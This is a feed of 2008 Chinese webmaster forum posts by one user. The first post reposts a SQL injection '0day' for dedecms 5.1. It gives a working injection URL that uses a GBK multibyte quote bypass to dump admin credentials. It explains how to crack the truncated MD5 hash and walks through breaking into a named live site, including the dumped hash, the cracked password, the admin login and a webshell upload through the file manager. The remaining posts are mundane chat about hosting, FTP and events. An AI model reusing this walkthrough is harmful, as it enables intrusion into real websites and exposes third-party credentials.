Latest from 飞腿站长站: tnrain

dedecms搜索型注入0day (2008.11.09) ... no reply

tnrain — Sun, 09 Nov 2008 15:18:50 +0800

dedecms GBK 5.1 搜索型注射0day

以下内容转载：

大家好，期待已久。今天给大家带来新的0day了
这个oday是有我老师CHAR发现的，因为工作关系不方便做动画，今天由我来给大家演示

漏洞成因:
$q = trim($q);
if($areaid > 0) {
$wheresql = "areaid=$areaid and ";
}
$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";
获得变量q,直接放入数据库查询.导致注入产生,这样一个搜索型的注入,本身对于php环境如果设置了magic_quote_gpc=on的话,利用起来是很难的.但是可以结合php多字节编码漏洞,这样,一个相对来说不错的利用方式产生了.可以如下构造,通过get方式提交.

废话不多说大家看操作

其他的自己下去研究楼

利用地址:
plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

补充:dedecms暴出来的管理员密码只有24位,这里我简单的来说一下,dedecms首先获得某密码的32位MD5加密值,然后去掉后面8位,这样,拿剩下的24位来做为密码的加密值.这里我们可以想到,32位转16位可以把32位的前8位和后8位去掉,剩下的中间就是其16位的加密值,注意：
我们可以把dedecms中暴出来的那窜24位加密值的前8位去掉,剩下的16位就可以拿去破解了.
24-8=16

详细了解可到我们学校的网站：
http://www.yhsafe.com
http://www.yhsafe.com/announce/2008/1108/article_46.html
演示网站：http://www.oiole.com/

dede/file_manage_main.php?activepath=/../

直接在网站地址后面加上利用地址就OK
http://www.oiole.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

忽忽，很激动吧，别急
账号：admin密码：f6e75e3832e763b6
密码是24位哦
呵呵24-8=16
常识
猜出来了密码是：sina.com
默认的dedecms后台都是dede目录下的，我们来看看
后台地址：http://www.oiole.com/dede/login.php?gotopage=%2Fdede%2Findex.php
成功登录，正在转向管理管理主页！
进入后台怎么拿SHELL那？
？？？？？
貌似fckeditor编辑器哦
废话少说
看这里了dede/file_manage_main.php?activepath=/../
直接加到网站后面
http://www.oiole.com/dede/file_manage_main.php?activepath=/../
最下面新建文件
压得操作块了
（空白表示根目录，不允许用 “..” 形式的路径）
表示，我们加的文件在根目录下的
test.asp我们打开看看
哦yes上去了
动画就到这里吧

http://www.yhsafe.com/demo/2008/1109/down_609.html

FTP服务器软件除了serv-u还有什么呢？ ... 1 reply

tnrain — Mon, 13 Oct 2008 05:55:31 +0800

vps上全都装serv-u了全冲突了！

有没有其他的工具可以代替它？

IIS上那个ftp么？
还没用过它类呵呵

yeswan的网页游戏用discuz来推广真是强！ ... 2 replies

tnrain — Sun, 12 Oct 2008 15:47:45 +0800

看yeswan的论坛一天暴涨几千人在线

全是用DZ的论坛带过去的效果真是不一般!

局域网用wifi的话能映射到内网机器做web不？ ... 2 replies

tnrain — Sat, 11 Oct 2008 15:20:36 +0800

楼下来？哈哈

Dreamhost里好象加入了Google mail? ... no reply

tnrain — Wed, 23 Apr 2008 09:47:19 +0800

新开站点时候新加了Google mail选项, 可以免费使用google的企业邮局了?

dreamhost怎么在线解压缩 ... 1 reply

tnrain — Wed, 09 Apr 2008 22:47:50 +0800

dreamhost怎么在线解压缩，看到个说要用个压缩工具

下下来拉不知道怎么用。。。

今天信箱收到一封骂景安的信 ... 5 replies

tnrain — Sat, 01 Mar 2008 01:01:51 +0800

尊敬的业界同行：

在互联网发展迅猛的今天，我公司及众多网络服务业界同行一起，努力改善产品和服务，为客户满意这个目标而奋斗。

但郑州景安机房，无视国家法律，无视商业道德，置公理于不顾，擅自剥夺侵占客户利益。先后曾无理对我公司托管的服务器断网，拒绝道歉和赔偿，我公司被迫终止托管服务器后，无理侵占我公司业务款，并拒绝一切渠道的协商。

对此，我公司忍无可忍，将郑州景安机房的行径公诸于众，求助于业界同行。与郑州景安机房的相关资料，及事件进展，都将发布在专题站“断网”，网址是：

http://www。duanwang。org

欢迎广大同行访问和指教。

谢谢！

山东滨州泽星互联网络技术有限公司
2008-2-29

百度联盟哎~~~ ... 1 reply

tnrain — Tue, 26 Feb 2008 15:32:30 +0800

百度联盟也把我K了。。。

郁闷。。。

PR更新了哈哈 ... 3 replies

tnrain — Sat, 12 Jan 2008 10:28:12 +0800

有小变化不太激动

做系统时候一进ghost就死机 ... no reply

tnrain — Sun, 06 Jan 2008 13:55:37 +0800

哎疯了以前还不是这样了

2008年1月12日IT草根聚首在上海 ... 3 replies

tnrain — Fri, 04 Jan 2008 16:49:52 +0800

聚会时间：2008年1月12日 13：00
聚会地点：上海市宛平宾馆三楼（上海市徐汇区宛平路315号）
参会人数：> 500人
参会费用：免费
媒体宣传：《新闻晨报》、《青年报》、《计算机世界》、《IT时代周刊》、《中国计算机报》、《IT时报》、上海电视台财经频道、新浪网、网易、搜狐……

嘉宾邀请人：王晨昀（更多嘉宾邀请中，欢迎自荐或推荐嘉宾 wangchenyun@126.com ）

已邀请的嘉宾（排名不分先后）：

王志东点击科技总经理
张涛大众点评网总经理
杨伟庆艾瑞咨询总经理
蒋明亮华宏伟、上海5G
庞升东 51.com总经理
王建硕客齐集总经理
达贝妮 Pcpie视频搜索总经理
关国光快钱总经理
张国华篱笆网（无忧团购网）总经理
戴志康康盛创想首席执行官
图王站长网创办人
李寻欢榕树下总经理
许广彬蓝芒科技总经理
刘小光上海火速总经理
董勤峰落伍者网站长
陈曦《创智赢家》冠军
华军华军软件园站长
李钟伟 Pchome.net 创办人，现上海商派总经理
裴大鹏 Shopex总经理（上海商派）
刘润央视国际大型公益“慈善1+1”
黄一孟、戴云杰 VERYCD 站长

更多嘉宾邀请中……

河南类来拉哈哈 ... 1 reply

tnrain — Fri, 28 Dec 2007 17:02:22 +0800

HOHO` No.1！